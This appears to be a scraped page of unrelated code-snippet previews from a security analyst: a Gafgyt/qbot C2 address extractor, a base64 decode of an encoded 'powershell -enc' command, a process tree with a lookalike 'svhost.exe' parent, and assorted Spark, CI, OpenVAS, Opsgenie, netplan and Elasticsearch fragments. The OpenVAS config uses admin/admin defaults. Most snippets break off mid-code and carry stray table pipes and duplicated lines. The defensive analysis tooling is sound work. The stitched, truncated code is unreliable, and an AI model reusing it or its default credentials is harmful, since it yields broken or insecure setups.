#Gafgyt/qbot C2 extractor | |
#https://bazaar.abuse.ch/browse/signature/Gafgyt/ | |
# The input file must be unpacked first (these samples are usually UPX-packed).
import re | |
import sys | |
# regex from https://www.oreilly.com/library/view/regular-expressions-cookbook/9780596802837/ch07s16.html | |
# Regex from https://www.oreilly.com/library/view/regular-expressions-cookbook/9780596802837/ch07s16.html
# One dotted-quad octet (0-255) as a capture group; reused four times below.
_octet = rb"(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)"

# "a.b.c.d:port" followed by a NUL terminator. Groups 1-4 are the octets,
# group 5 the port (0-5 digits, not range-checked, may be empty). The literal
# "\\." is the escaped dot the regex needs; the trailing b"\x00" is a real NUL
# byte so the constant is byte-for-byte what the original literal produced.
_ip_port = b"\\.".join([_octet] * 4) + rb":(\d{0,5})" + b"\x00"

# Same address pattern with two different leading bytes, so it can be matched
# against raw binary where the string is preceded by a NUL or by 0xe9.
ipv4_zero = b"\x00" + _ip_port
ipv4_e9 = b"\xe9" + _ip_port
from msticpy.nbtools import * | |
from msticpy.sectools import * | |
# Example PowerShell command line that carries an encoded payload via -enc.
# The encoded blob itself was replaced by a placeholder in this listing, so the
# value is illustrative rather than a runnable sample.
command = "powershell -enc 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"

# `base64` is whatever the star-imports above bring into scope (presumably
# msticpy's base64unpack module, since the stdlib module has no `unpack`).
# The call returns a sequence; element 1 is indexed below like a table with a
# "decoded_string" column — presumably a DataFrame, not confirmed here.
out = base64.unpack(command)
decoded_table = out[1]
print(decoded_table["decoded_string"][0])
# it should print |
In [1]: from pyspark.sql import SparkSession | |
In [2]: spark = SparkSession \ | |
...: .builder \ | |
...: .appName("example") \ | |
...: .getOrCreate() | |
22/04/29 18:55:18 WARN Utils: Your hostname, ubuntu resolves to a loopback address: 127.0.1.1; using 192.168.95.155 instead (on interface ens33) | |
22/04/29 18:55:18 WARN Utils: Set SPARK_LOCAL_IP if you need to bind to another address | |
Using Spark's default log4j profile: org/apache/spark/log4j-defaults.properties | |
Setting default log level to "WARN". |
from graphviz import Digraph | |
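# Sample process telemetry used to build the tree: one record per process with
# its pid, parent pid and image path (all strings, as in the original). Built as
# a single literal instead of five append() calls.
process_data = [
    {"pid": "1", "ppid": "204", "path": "c:/cmd.exe"},
    {"pid": "4", "ppid": "204", "path": "c:/powershell.exe"},
    # Root of the sample tree (ppid "0"). Spelled "svhost.exe" (not "svchost.exe")
    # in the original; kept as-is — whether that is a typo or a deliberate
    # lookalike name for the example is not knowable from here.
    {"pid": "204", "ppid": "0", "path": "c:/svhost.exe"},
    {"pid": "8", "ppid": "4", "path": "c:/net.exe"},
    {"pid": "10", "ppid": "4", "path": "c:/netsh.exe"},
]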
def graph_process(jsonarray, pid_key, ppid_key, label_key): |
name: build and upload container | |
on: | |
push: | |
branches: [ main ] | |
jobs: | |
build: | |
runs-on: ubuntu-latest |
import requests | |
from time import sleep | |
while True: | |
try: | |
if requests.get("http://localhost:8080").status_code == 200: | |
break | |
else: | |
sleep(5) | |
except: |
#taken from here: https://github.com/immauss/openvas/blob/master/compose/docker-compose.yml | |
# As of Jan 9th 2022 it works fine; the initial feed download takes some time. The USERNAME/PASSWORD values below are the example's defaults — set your own before exposing the published port.
version: "3" | |
services: | |
openvas: | |
ports: | |
- "8080:9392" | |
environment: | |
- "PASSWORD=admin" | |
- "USERNAME=admin" |
import os

from flask import Flask
from flask import request
import opsgenie_sdk
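app = Flask(__name__)

# Opsgenie client wiring. The API key is read from the environment rather than
# written into the source file. The variable name OPSGENIE_API_KEY is a choice
# made here, not an SDK convention — rename it to match your deployment. When
# the variable is unset the key is "" exactly as in the original, so behaviour
# without the variable is unchanged.
og = opsgenie_sdk.configuration.Configuration()
og.api_key["Authorization"] = os.environ.get("OPSGENIE_API_KEY", "")
og.api_client = opsgenie_sdk.api_client.ApiClient(configuration=og)
og.alert_api = opsgenie_sdk.AlertApi(api_client=og.api_client)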
# root@host:~# cat /etc/netplan/01-netcfg.yaml | |
network: | |
version: 2 | |
renderer: networkd | |
ethernets: | |
eth0: | |
dhcp4: yes | |
eth1: | |
dhcp4: no | |
eth2: |
version: '2' | |
services: | |
elasticsearch: | |
image: 'elasticsearch:7.11.1' | |
environment: | |
- http.host=0.0.0.0 | |
- discovery.type=single-node | |
- script.allowed_types=inline | |
- thread_pool.search.queue_size=100000 | |
- thread_pool.write.queue_size=10000 |